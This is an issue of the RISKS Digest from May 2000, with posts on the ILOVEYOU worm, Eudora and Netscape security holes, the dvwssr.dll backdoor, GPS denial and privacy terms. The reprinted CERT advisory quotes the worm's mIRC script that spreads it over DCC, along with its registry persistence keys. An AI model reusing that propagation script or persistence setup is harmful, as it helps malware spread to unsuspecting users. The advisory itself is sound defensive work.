The Risks Digest

The RISKS Digest

Forum on Risks to the Public in Computers and Related Systems

ACM Committee on Computers and Public Policy, Peter G. Neumann, moderator

Volume 20 Issue 88

Sunday 14 May 2000

Contents

o Love Letter Worm, CERT Advisory CA-2000-04
CERT
o Mainstream media get a clue about Microsoft security
Russ Cage
o Peacefire: Eudora "Stealth Attachment" Security Hole Discovered
Bennett Haselton
o Netscape Navigator Improperly Validates SSL Sessions, CERT Advisory CA-2000-05
CERT
o FBI gun-check computer crashes
Declan McCullagh
o Risk: Selective denial of GPS signals
Mike Fisk
o Phone fault sparks sausage frenzy
Ian Simpson
o Network trashcan
Conrad Heiney
o Stupid appliance ideas
Lloyd Wood
o netzero: defenders of the free world?
Laurentiu Badea
o Re: Security experts discover rogue code in Microsoft software
Russ Cooper
o Re: Encryption code protected by First Amendment
Terry Carroll
o Re: Hotmail wants to know...
Jon Ribbens
o Re: No, Virginia
Mark Brader
o Info on RISKS (comp.risks)

Love Letter Worm, CERT Advisory CA-2000-04

CERT Advisory <cert-advisory@cert.org>
Thu, 4 May 2000 20:43:48 -0400 (EDT)
  [Always check the CERT Web site for updates on any CERT Advisory that
  is included in RISKS.  This item is a starkly abridged version of the
  original Advisory 2000-04.  Subsequent to the first appearance of
  ILOVEYOU, there have been numerous copycat variants, and assessments
  of damage on the order of many billion dollars.]
     [HOWEVER, please take a look at my written testimony on ILOVEYOU and
     its wider implications, which I submitted to the House Science Committee
     Subcommittee on Technology on 10 May 2000, Risks in Our Information
     Infrastructures: The Tip of a Titanic Iceberg Is Still All That Is
     Visible --
       http://www.csl.sri.com/neumann/house00.html
     PGN]

CERT Advisory CA-2000-04 Love Letter Worm

   Original release date: May 4, 2000
   Last revised: --
   Source: CERT/CC

Systems Affected

 * Systems running Microsoft Windows with Windows Scripting Host enabled

Overview

   The "Love Letter" worm is a malicious VBScript program which spreads
   in a variety of ways. As of 2:00pm EDT(GMT-4) May 4, 2000 -- the CERT
   Coordination Center has received reports from more than 250 individual
   sites indicating more than 300,000 individual systems are affected. In
   addition, we have several reports of sites suffering considerable
   network degradation as a result of mail, file, and web traffic
   generated by the "Love Letter" worm.

I. Description

   You can be infected with the "Love Letter" worm in a variety of ways,
   including electronic mail, Windows file sharing, IRC, USENET news and
   possibly via webpages. Once the worm has executed on your system, it
   will take the actions described in the Impact section.

Electronic Mail

   When the worm executes, it attempts to send copies of itself using
   Microsoft Outlook to all the entries in all the address books. The
   mail it sends has the following characteristics:
     * An attachment named "LOVE-LETTER-FOR-YOU.TXT.VBS"
     * A subject of "ILOVEYOU"
     * A body which reads "kindly check the attached LOVELETTER coming
       from me."

   People who receive copies of the worm via electronic mail will most
   likely recognize the sender. We encourage people to avoid executing
   code, including VBScripts, received through electronic mail regardless
   of the sender without firsthand prior knowledge of the origin of the
   code.

Internet Relay Chat

   When the worm executes, it will attempt to create a file named
   script.ini in any directory that contains certain files associated
   with the popular IRC client mIRC. The script file will attempt to send
   a copy of the worm via DCC to other people in any IRC channel joined
   by the victim. We encourage people to disable automatic reception of
   files via DCC in any IRC client.

Executing Files on Shared File Systems

   When the worm executes, it will search for certain types of files and
   replace them with a copy of the worm (see the Impact section for more
   details). Executing (double clicking) files modified by other infected
   users will result in executing the worm. Files modified by the worm
   may also be started automatically, for example from a startup script.

Reading USENET News

   There have been reports of the worm appearing in USENET newsgroups.
   The suggestions above should be applied to users reading messages in
   USENET newsgroups.

II. Impact

   When the worm is executed, it takes the following steps:

Replaces Files with Copies of the Worm

   When the worm executes, it will search for certain types of files and
   make changes to those files depending on the type of file. For files
   on fixed or network drives, it will take the following steps:
     * For files whose extension is vbs or vbe it will replace those
       files with a copy of itself.
     * For files whose extensions are js, jse, css, wsh, sct, or hta, it
       will replace those files with a copy of itself and change the
       extension to vbs. For example, a file named x.css will be replaced
       with a file named x.vbs containing a copy of the worm.
     * For files whose extension is jpg or jpeg, it will replace those
       files with a copy of the worm and add a vbs extension. For
       example, a file named x.jpg will be replaced by a file called
       x.jpg.vbs containing a copy of the worm.
     * For files whose extension is mp3 or mp2, it will create a copy of
       itself in a file named with a vbs extension in the same manner as
       for a jpg file. The original file is preserved, but its attributes
       are changed to hidden.

   Since the modified files are overwritten by the worm code rather than
   being deleted, file recovery is difficult and may be impossible.

   Users executing files that have been modified in this step will cause
   the worm to begin executing again. If these files are on a filesystem
   shared over a local area network, new users may be affected.

Creates an mIRC Script

   While the worm is examining files as described in the previous
   section, it may take additional steps to create a mIRC script file. If
   the file name being examined is mirc32.exe, mlink32.exe, mirc.ini,
   script.ini or mirc.hlp, the worm will create a file named script.ini
   in the same folder. The script.ini file will contain:

   [script]

   n0=on 1:JOIN:#:{
   n1=  /if ( $nick == $me ) { halt }
   n2=  /.dcc send $nick DIRSYSTEM\LOVE-LETTER-FOR-YOU.HTM
   n3=}

   where DIRSYSTEM varies based on the platform where the worm is
   executed. If the file script.ini already exists, no changes occur.

   This code appears to define a script such that whenever the user joins
   a channel in IRC, a copy of the worm will be sent to others on the
   channel via DCC. The script.ini file is created only once per folder
   processed by the worm.

Modifies the Internet Explorer Start Page

   If the file <DIRSYSTEM>\WinFAT32.exe exists, the worm sets the
   Internet Explorer Start page to one of four randomly selected URLs.
   These URLs all refer to a file named WIN-BUGSFIX.exe, which presumably
   contains malicious code. The worm checks for this file in the Internet
   Explorer downloads directory, and if found, it is added to the list of
   programs to run at reboot. The Internet Explorer Start page is then
   reset to "about:blank". Information about the impact of running
   WIN-BUGSFIX.exe will be added to this document as soon as it is
   available.

Send Copies of Itself via E-mail

   The worm will attempt to use Microsoft Outlook to send copies of
   itself to all entries in all address books as described in the
   Description section.

Other Modified Registry Keys

   In addition to other changes, the worm updates the following registry
   keys:

   HKLM\Software\Microsoft\Windows\CurrentVersion\Run\MSKernel32
   HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices\Win32DLL
   HKLM\Software\Microsoft\Windows\CurrentVersion\Run\WIN-BUGSFIX
   HKCU\Software\Microsoft\Windows Scripting Host\Settings\Timeout
   HKCU\Software\Microsoft\Internet Explorer\Main\Start Page
   HKCU\Software\Microsoft\WAB\*

III. Solution

Update Your Anti-Virus Product  [...]
Disable Windows Scripting Host [...]
Disable Active Scripting in Internet Explorer [...]
Disable Auto-DCC Reception in IRC Clients [...]
Filter Virus in E-Mail [...]
Sendmail [...]
PostFix [...]
Procmail [...]
Exercise Caution When Opening Attachments [...]
Appendix A. Anti-Virus Vendor Information [...]

   [The full Advisory as updated is available from:
   http://www.cert.org/advisories/CA-2000-04.html]

CERT/CC Contact Information

  E-mail: cert@cert.org
          Phone: +1 412-268-7090 (24-hour hotline)
          Fax: +1 412-268-6989
          Postal address:
          CERT Coordination Center
          Software Engineering Institute
          Carnegie Mellon University
          Pittsburgh PA 15213-3890
          U.S.A.

   CERT personnel answer the hotline 08:00-20:00 EST(GMT-5) / EDT(GMT-4)
   Monday through Friday; they are on call for emergencies during other
   hours, on U.S. holidays, and on weekends.

   Conditions for use, disclaimers, and sponsorship information [...]
   Copyright 2000 Carnegie Mellon University.

   [PGN-ed for RISKS.]


Mainstream media get a clue about Microsoft security

Russ Cage <spherethis@yahoo.com>
Fri, 5 May 2000 10:01:20 -0700 (PDT)
In the flurry of news about the LoveBug virus, this article stands out:
http://news.bbc.co.uk/low/english/sci/tech/newsid_737000/737396.stm.
It represents one of the first mainstream media pieces to note that
the problem with computer viruses is enabled by Microsoft's designs
and wouldn't exist without them.

``Peter Sommer... told BBC News Online that Microsoft created these by
building in to their software the tools needed to customize applications.
Microsoft customers are going to have to ask the company to review very
carefully the level of functionality that they are putting into their
systems. [...]  One has got to ask why products are put out which contain
these programming languages, which may be of use to perhaps only 3 to 4% of
the customers but for everyone else presents a considerable threat.  [...]
These features are also very difficult to turn off. The lesson from Love Bug
is that people must be able to kill off this programming functionality
within applications programs."

Other experts from virus companies are quoted as deflecting the blame from
Microsoft, but their business interests depend on there being viruses to
stop.  If the Windows security model made it very difficult for viruses to
propagate, these companies would probably not exist any more.


Peacefire: Eudora "Stealth Attachment" Security Hole Discovered

Bennett Haselton <bennett@peacefire.org>
Thu, 27 Apr 2000 18:35:39 -0500
Peacefire has discovered a security hole in all versions of Eudora mail for
Windows, that can allow a hacker to execute code on a user's machine, by
sending the user e-mail and having them click on a link:

    http://www.peacefire.org/security/stealthattach/

(For example, a Eudora user would see this message with the URL above made
into a hyperlink so that you can click on it and load it into your browser.
Using the "stealth attachment" security exploit, you can force code to run
on the user's machine when they click on the link.  Don't worry, *this*
message is safe :-) But you can go to the above URL and request a
"demonstration mail" to be sent to you.)

Security holes that allow you to run code on a remote user's machine just by
sending them e-mail, are extremely dangerous -- a hacker could use this to
steal or erase any classified data on a remote user's hard drive, even if
that user were behind a corporate firewall and had anti-virus software
running.  A virus writer could use the exploit to write a virus that could
spread to almost all Eudora users -- numbering in the millions -- and
potentially do hundreds of millions of dollars' worth of damage.  (Unlike
most such tricks, this exploit does not require the user to do anything
"naive", like run an .exe that is sent to them as an attachment.)  USA Today
reported last year on the "BubbleBoy" virus, which similarly used a security
hole in Microsoft Outlook to cause code to run on a user's machine, simply
by reading an e-mail message:
http://www.usatoday.com/life/cyber/tech/ctg633.htm

Unfortunately, unlike the security hole that Peacefire discovered last
week:
        http://www.peacefire.org/security/jscookies/
    http://news.cnet.com/news/0-1005-200-1717169.html
    http://www.zdnet.com/zdnn/stories/news/0,4586,2553337,00.html
    http://www.ntsecurity.net/go/load.asp?iD=/security/netscape2.htm

this security hole doesn't involve any cool industry buzzwords like
"javascript" or "cookies".  This one just involves -- *YAWN* --
e-mail.  That is, like, *so* 20th-century.  Sorry if this is inconvenient
for journalists writing about this stuff :-)

bennett@peacefire.org     (425) 649 9024      http://www.peacefire.org


Netscape Navigator Improperly Validates SSL Sessions, CERT Advisory CA-2000-05

CERT Advisory <cert-advisory@cert.org>
Fri, 12 May 2000 15:06:11 -0400 (EDT)
CERT Advisory CA-2000-05
Netscape Navigator Improperly Validates SSL Sessions

   Original release date: May 12, 2000
   Source: ACROS, CERT/CC  [...]

Systems Affected

     * Systems running Netscape Navigator 4.72, 4.61, and 4.07. Other
       versions less than 4.72 are likely to be affected as well.

Overview

   The ACROS Security Team of Slovenia has discovered a flaw in the way
   Netscape Navigator validates SSL sessions.

   [The complete CERT Advisory is available from:
     http://www.cert.org/advisories/CA-2000-05.html
   PGN-ed for RISKS]


FBI gun-check computer crashes

Declan McCullagh <declan@well.com>
Sat, 13 May 2000 11:51:37 -0400
http://www.wired.com/news/print/0,1294,36310,00.html

The FBI's Interstate Identification Index database system crashed on 11 May,
preventing background checks of some 100,000 would-be gun purchasers who
have to be vetted by the National Instant Check System.  The crash also
prevented use of the Integrated Automated Fingerprint Identification System
associated with the National Crime Information Center NCIC 2000.  Service
expected to return on 14 May.  [The U.S. General Accounting Office notes
that NICS was offline for 215 hours from November 1998 to November 1999.
[PGN-ed]


Risk: Selective denial of GPS signals

Mike Fisk <mfisk@lanl.gov>
Mon, 1 May 2000 17:44:03 +0000 (GMT)
President Clinton announced today that the US government will no longer use
its "Selective Availability" feature to degrade the precision of
measurements possible with civilian (and non-US government) Global
Positioning System (GPS) receivers.  One of the concerns cited in the
announcement is the ability to use GPS for emergency response and other
critical, civilian uses.

It is also stated that one of the reasons the US is comfortable making this
change is that it has "demonstrated the capability to selectively deny GPS
signals on a regional basis when our national security is threatened."

The risks: Will this lead to more dependence on a system that may be made
unavailable at any time?  For example pilots, outdoor enthusiasts, and
rescue services all use GPS for routine navigation.  If that signal was
suddenly made unavailable, would these people still have the necessary
skills to navigate using non-GPS techniques such as map and compass and
terrestrial radio beacons?  What about fail-over in automatic computer
systems (such as autopilots) that depend on GPS?

The full announcement is available at the following URL:
    http://www.igeb.gov/sa/potus.txt

Mike Fisk, RADIANT Team, Network Engineering Group, Los Alamos National Lab
See http://home.lanl.gov/mfisk/ for contact information


Phone fault sparks sausage frenzy

"Ian Simpson" <ian.g.simpson@btinternet.com>
Thu, 4 May 2000 18:54:25 +0100
Alison Mckenzie, of Peterhead, in Aberdeenshire, phoned a 24-hour
environmental services helpline after a chorizo sausage she had bought
turned out to be green.  As a result of a British Telecom system fault, the
call was automatically forwarded to police service voicebanks, but also in
text form to every BT pager number beginning with 01426.
  [Not green with envy, and certainly not environmentally green.
  Mayhaps it was an Irish chorizo?  As usual, the wurst is yet to come.
  PGN-ed from Ian's sources,
http://news2.thls.bbc.co.uk/hi/english/uk/scotland/newsid%5F735000/735531.stm
http://www.thisisnorthscotland.co.uk/scripts/edarticle-p.asp?
section=National+news&ID=29726&source=NAT]


Network trashcan

"Conrad Heiney" <conrad@fringehead.org>
Fri, 28 Apr 2000 15:22:28 -0700
A friend of mine works for [Huge Corporation], where security is frequently
announced as being imperative. The operating system of choice is Windows NT,
and much work is shared on a networked "drive" type share. This "drive" has
a trashcan icon on it.

Fishing in said network trashcan results in the discovery of all sorts of
information, including Word documents with draft policies, the home
addresses of top executives, financial information, etc.

The RISK here is that people expect something that looks like a trashcan to
behave like one, and behave accordingly. The Memory Hole has become a
security hole.

-- Conrad Heiney conrad@fringehead.org http://fringehead.org/

  [Ah, yes, that is just like your home trashcans.  Publically
  available.  You have no idea what dumpster diving can go on
  after you put something in it.  Don't forget all the deleted stuff
  still in the Word file.  You need a bit shredder.  Cryptography?
  Still maybe not enough, but closer.  PGN]


Stupid appliance ideas

Lloyd Wood <l.wood@eim.surrey.ac.uk>
Sun, 7 May 2000 00:32:36 +0100 (BST)
Of late, there has been a surge in interest in networking domestic
appliances. Electrolux and Whirlpool plan ScreenFridges, where you can see
recipes and order food. Ariston has a washing machine with a built-in modem
which can telephone automatically for software upgrades for the programme
controller.

And now there's BT, with:
http://www.telegraph.co.uk/et?ac=000111464113065&pg=/et/00/5/7/ntac07.html
where domestic appliances are chipped and authorised for use by a home
management centre phoning your insurance company.

The failure modes here are legion. Move house, and discover that your
appliances no longer work while you enter a protracted discussion with your
insurance company to authorise your home management centre in its new
location (no doubt necessary to prevent the home management centre from
being stolen). Have your home management centre crash [Ariston has proposed
its kitchen centre be run on Windows CE], and watch it take out your entire
kitchen, denying you service in the process.

Not so much white goods ideas, as white jacket ideas. It's a recipe
for disaster.

plumb and play. hah.

<L.Wood@surrey.ac.uk>PGP<http://www.ee.surrey.ac.uk/Personal/L.Wood/>


netzero: defenders of the free world?

Laurentiu Badea <bytemare@lmn.pub.ro>
29 Apr 2000 17:19:10 -0700
The "Terms and Conditions" you must accept to use the "free" NetZero service
include giving up your privacy among other "minor" things:

1) obligation on your part to fill out with real information all
   questionnaires and survey forms they send;

2) allowing NetZero to learn your browsing habits by tracking all the websites
   you visit and compile, sell and USE that information.
   They say personal identifying info won't be disclosed but just the simple
   fact that they store it on their system where is available to anybody who
   could lawfully or not access it, is a problem. Let alone they don't exclude
   themselves from using it so it is possible for them to target you directly.

3) you cannot disable cookies, bypass their ad program (meaning that you can't
   install firewalling software that would block the ad stream)

4) you allow them to alter your e-mail messages by adding advertising which
   you cannot remove or obscure (not unusual);

5) the most ridiculous note is that the whole agreement can be changed at any
   time by posting them on their website, and require you to check them every
   time before you "use the service", and not use it if you don't agree. Let
   alone the impossibility of this (how can you browse their website without
   already being connected, thus using the service), it puts an unreasonable
   burden on the user. How many will remember the original contract and check
   the new one for differences, I doubt they would post a "diff" file there :-)

Laurentiu Badea


Re: Security experts discover rogue code in Microsoft software

Russ <Russ.Cooper@rc.on.ca>
Mon, 1 May 2000 08:51:05 -0400
It's extremely important to clarify this "Netscape engineers are weenies!"
story.

For a variety of reasons, one of which being my own quotes in the original
*Wall Street Journal* article on this issue, the public has been overly
warned against an extremely limited threat... while the real threat from the
dvwssr.dll has been largely ignored by the media.

First, clarification of the "secret backdoor password" threat.  The
possibility that the string above could be used to access the source of
Active Server Page (.asp) web files, or configuration files known as .asa,
is entirely dependent on the permissions configured on an IIS web server.
By default, no access can be gained.  If permissions are mis-configured,
allowing anonymous read access to the files (they should be permissioned for
anonymous *execute*, not read), then there is a way that the obfuscation
could permit access.  It should be noted that with such a mis-configured
system, numerous other access methods would be available also.

The important story overlooked was a discovery by CORE-SDI later in the
evening after the backdoor story had run virtually everywhere.

CORE-SDI, not more than 8 hours after first looking at the dvwssr.dll, was
able to published details on a buffer overrun in that .dll that could permit
a DoS of IIS boxes.  By some other machinations (including moving the file to
a directory where it would not normally be found), they were able to execute
arbitrary code on the attacked box.

Everyone, RFP (who's advisory caused the original stir), CORE-SDI, and
Microsoft advised that the dvwssr.dll simply be deleted (from all of its
locations) in order to remedy the potential problem(s).

While this particular program had minimal use in its lifetime, the fact that
a static password (used for obfuscation, not entry) was even present should
not be understated. This program has survived numerous Q&A cycles and, if we
believe that source code for NT has been available at some 30+ U.S.
Universities for years, numerous code reviews.

Of interest to RISKS readers should be the fact that MS was, presumably,
unaware that it was using obfuscation for security in that program.

Russ - NTBugtraq Editor
"dot-age" (as in "we're in the dot-age") = senility (source Webster's)


Re: Encryption code protected by First Amendment

Terry Carroll <carroll@tjc.com>
Fri, 28 Apr 2000 19:57:23 -0700 (PDT)
On Wed, 05 Apr 2000, "NewsScan" wrote:

> A federal appeals court in Ohio has ruled that encryption software code is
> protected by the First Amendment because such code is a means of
> communication between computer programmers.

For those who want to read the court's opinion itself, it's online at
the Sixth Circuit Court of Appeals website.  The URL is
<http://pacer.ca6.uscourts.gov/cgi-bin/getopn.pl?OPINION=00a0117p.06>; a
PDF-formatted file (in two-up form intended for publication as a slip
opinion, so the pagination may look odd to you) is at
<http://pacer.ca6.uscourts.gov/opinions.pdf/00a0117p-06.pdf>.

The citation is Junger v. Daley, No. 98-4045 (6th Cir. Apr. 4, 2000).

The opinion is only 8 pages long, most of which simply relates the facts,
discusses the standard of appellate review, or states the restates resulting
order.  The analysis of source code as speech is remarkably short, on page
7, the gist of which is:

  The Supreme Court has expressed the versatile scope of the First
  Amendment by labeling as "unquestionably shielded" the artwork of
  Jackson Pollack, the music of Arnold Schoenberg, or the Jabberwocky
  verse of Lewis Carroll. ...  Though unquestionably expressive, these
  things identified by the Court are not traditional speech.
  Particularly, a musical score cannot be read by the majority of the
  public but can be used as a means of communication among musicians.
  Likewise, computer source code, though unintelligible to many, is the
  preferred method of communication among computer programers [sic].

  Because computer source code is an expressive means for the exchange
  of information and ideas about computer programming, we hold that it
  is protected by the First Amendment.

Terry Carroll, Santa Clara, CA <carroll@tjc.com>  "The United States is
  located in the District of Columbia."  Uniform Commercial Code s. 9-307(h)


Re: Hotmail wants to know... (Richards, RISKS-20.87)

Jon Ribbens <jon@oaktree.co.uk>
Mon, 1 May 2000 20:28:41 +0100
>The proof of adult status required? A credit card number.
>1) I refuse to give my credit card number for a non-purchase reason.

You may well find that your credit card Terms and Conditions forbid you
from giving your credit-card number to anyone for any reason other than
making a purchase.  Mine do.

Jon Ribbens / jon@oaktree.co.uk


Re: No, Virginia (Burstein, RISKS-20.86)

Mark Brader <msb@vex.net>
Fri, 28 Apr 2000 21:21:59 -0400 (EDT)
Danny Burstein writes:
> Permit me to point out that the famous letter, from Virginia O'Hanlon, was
> first printed in the *New York Sun* of 21 September 1897.

And in the letter, Virginia quotes her father as saying "if you see it in
the Sun, it's so".

The New York Sun is also the paper where a series of six articles in August
1835 told how astronomer John Herschel, using a great telescope of new (and
in fact impossible) design in South Africa, had observed amazing geological
formations and a great variety of life-forms on (and flying above) the
surface of the Moon...

Of course, this message is off-topic.  Questions such as how to determine
which information source to trust have no Risks relevance whatever. :-)

Mark Brader   "Never trust anybody who says 'trust me.'
Toronto       Except just this once, of course."   John Varley, "Steel Beach"

Please report problems with the web pages to the maintainer

Top